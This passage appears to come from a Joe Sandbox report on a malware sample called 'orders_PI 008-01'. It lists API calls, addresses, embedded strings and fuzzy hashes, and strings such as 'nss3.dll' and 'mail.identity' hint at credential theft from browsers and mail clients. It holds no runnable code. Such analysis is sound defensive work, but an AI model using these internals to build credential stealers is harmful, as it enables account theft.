                                        • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Message$MenuPostSendStringmemset
                                        • String ID:
                                        • API String ID: 3798638045-0
                                        • Opcode ID: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                        • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                        • Opcode Fuzzy Hash: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                        • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                        APIs
                                          • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                          • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                        • strlen.MSVCRT ref: 0040B60B
                                        • atoi.MSVCRT(?,00000000,?,75570A60,?,00000000), ref: 0040B619
                                        • _mbsicmp.MSVCRT ref: 0040B66C
                                        • _mbsicmp.MSVCRT ref: 0040B67F
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbsicmp$??2@??3@atoistrlen
                                        • String ID:
                                        • API String ID: 4107816708-0
                                        • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                        • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                        • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                        • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                        • _gmtime64.MSVCRT ref: 00411437
                                        • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                        • strftime.MSVCRT ref: 00411476
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                        • String ID:
                                        • API String ID: 1886415126-0
                                        • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                        • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                        • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                        • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strlen
                                        • String ID: >$>$>
                                        • API String ID: 39653677-3911187716
                                        • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                        • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                        • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                        • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                        APIs
                                        • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                        • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                        • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: @
                                        • API String ID: 3510742995-2766056989
                                        • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                        • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                        • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                        • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strcmpi
                                        • String ID: C@$mail.identity
                                        • API String ID: 1439213657-721921413
                                        • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                        • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                        • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                        • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                        APIs
                                        • memset.MSVCRT ref: 00406640
                                          • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                          • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                          • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                        • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                        • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset$memcmp
                                        • String ID: Ul@
                                        • API String ID: 270934217-715280498
                                        • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                        • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                        • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                        • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                        APIs
                                          • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                          • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75570A60), ref: 00408EBE
                                        • sprintf.MSVCRT ref: 0040B929
                                        • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                          • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408E31
                                          • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                        • sprintf.MSVCRT ref: 0040B953
                                        • _mbscat.MSVCRT ref: 0040B966
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                        • String ID:
                                        • API String ID: 203655857-0
                                        • Opcode ID: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                        • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                        • Opcode Fuzzy Hash: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                        • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                        APIs
                                        • memset.MSVCRT ref: 0040ADE8
                                        • memset.MSVCRT ref: 0040ADFE
                                          • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                          • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                        • sprintf.MSVCRT ref: 0040AE28
                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`Wu,00000000,?,?,0040A7BE,00000001,0044CBC0,75570A60), ref: 00406D4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                        • String ID: </%s>
                                        • API String ID: 3699762281-259020660
                                        • Opcode ID: 8cab70514fe5aa4f21475794247a492732dcbe2e03c6ed67b3b3c257d80e3403
                                        • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                        • Opcode Fuzzy Hash: 8cab70514fe5aa4f21475794247a492732dcbe2e03c6ed67b3b3c257d80e3403
                                        • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                        APIs
                                          • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                        Strings
                                        • recovered %d pages from %s, xrefs: 004188B4
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                        • String ID: recovered %d pages from %s
                                        • API String ID: 985450955-1623757624
                                        • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                        • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                        • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                        • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _ultoasprintf
                                        • String ID: %s %s %s
                                        • API String ID: 432394123-3850900253
                                        • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                        • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                        • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                        • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                        APIs
                                        • LoadMenuA.USER32(00000000), ref: 00409078
                                        • sprintf.MSVCRT ref: 0040909B
                                          • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                          • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                          • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                          • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                          • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                          • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                          • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                        • String ID: menu_%d
                                        • API String ID: 1129539653-2417748251
                                        • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                        • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                        • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                        • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                        APIs
                                        Strings
                                        • failed memory resize %u to %u bytes, xrefs: 00411706
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _msizerealloc
                                        • String ID: failed memory resize %u to %u bytes
                                        • API String ID: 2713192863-2134078882
                                        • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                        • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                        • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                        • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                        APIs
                                          • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                        • strrchr.MSVCRT ref: 00409808
                                        • _mbscat.MSVCRT ref: 0040981D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileModuleName_mbscatstrrchr
                                        • String ID: _lng.ini
                                        • API String ID: 3334749609-1948609170
                                        • Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                        • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                        • Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                        • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                        APIs
                                        • strlen.MSVCRT ref: 00406D40
                                        • WriteFile.KERNEL32(0044CBC0,00000001,00000000,`Wu,00000000,?,?,0040A7BE,00000001,0044CBC0,75570A60), ref: 00406D4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileWritestrlen
                                        • String ID: `Wu
                                        • API String ID: 672350951-3261129705
                                        • Opcode ID: cac463ce90e89d513bccef4edf21d7ab06550908c64ce4a29a21b7a7f24cdced
                                        • Instruction ID: a1daa8ef38dceb764141083f29503c44cd6ba7bd5444bb4604710c8dfa57da9a
                                        • Opcode Fuzzy Hash: cac463ce90e89d513bccef4edf21d7ab06550908c64ce4a29a21b7a7f24cdced
                                        • Instruction Fuzzy Hash: 81D0C97500010CBFEF019F41EC46EA93B6DEB05258F108025F90488061DBB1EE109B65
                                        APIs
                                        • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                          • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                          • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                        • _mbscat.MSVCRT ref: 004070FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscat$_mbscpystrlen
                                        • String ID: sqlite3.dll
                                        • API String ID: 1983510840-1155512374
                                        • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                        • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                        • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                        • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                        APIs
                                        • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                        • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: LongWindow
                                        • String ID: MZ@
                                        • API String ID: 1378638983-2978689999
                                        • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                        • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                        • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                        • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                        APIs
                                        • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString
                                        • String ID: A4@$Server Details
                                        • API String ID: 1096422788-4071850762
                                        • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                        • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                        • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                        • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                        APIs
                                        • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                        • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                        • memset.MSVCRT ref: 0042C932
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID:
                                        • API String ID: 438689982-0
                                        • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                        • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                        • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                        • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                        APIs
                                        • strlen.MSVCRT ref: 0040849A
                                        • memset.MSVCRT ref: 004084D2
                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,7568EB20,?,00000000), ref: 0040858F
                                        • LocalFree.KERNEL32(00000000,?,?,?,?,7568EB20,?,00000000), ref: 004085BA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeLocalmemcpymemsetstrlen
                                        • String ID:
                                        • API String ID: 3110682361-0
                                        • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                        • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                        • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                        • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                        APIs
                                        • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                        • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                        • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                        • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID:
                                        • API String ID: 3510742995-0
                                        • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                        • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                        • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                        • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                        APIs
                                          • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099A3
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099CC
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099ED
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 00409A0E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
